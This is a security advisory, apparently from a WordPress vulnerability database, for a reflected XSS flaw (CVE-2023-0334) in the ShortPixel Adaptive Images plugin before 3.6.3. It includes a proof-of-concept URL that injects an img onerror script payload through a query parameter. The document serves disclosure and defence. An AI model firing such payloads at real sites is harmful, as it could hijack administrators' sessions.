WordPress Plugin Vulnerabilities

ShortPixel Adaptive Images < 3.6.3 - Reflected XSS

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against any high privilege users such as admin

Proof of Concept

https://example.com/?SPAI_VJS=%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(/XSS/);%3E

Affects Plugins

Plugin icon
shortpixel-adaptive-images
Fixed in 3.6.3

References

CVE
CVE-2023-0334

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.5 (high)

Miscellaneous

Original Researcher
dc11
Submitter
dc11
Verified
Yes
WPVDB ID
b027a8db-0fd6-444d-b14a-0ae58f04f931

Timeline

Publicly Published
2023-01-31 (about 1 years ago)
Added
2023-01-31 (about 1 years ago)
Last Updated
2023-02-03 (about 1 years ago)

Other

Published
Title
Published
2024-04-01
Title
Beaver Builder < 2.8.0.7 - Contributor+ Stored XSS
Published
2023-07-17
Title
WP Food Manager < 1.0.4 - Admin+ Stored XSS
Published
2014-08-01
Title
Folo - Cross Site Scripting
Published
2015-08-10
Title
Google Analytics by Yoast <= 5.4.4 - Authenticated Stored Cross-Site Scripting (XSS)
Published
2005-06-30
Title
WordPress <= 1.5.1.2 - Multiple Cross-Site Scripting (XSS)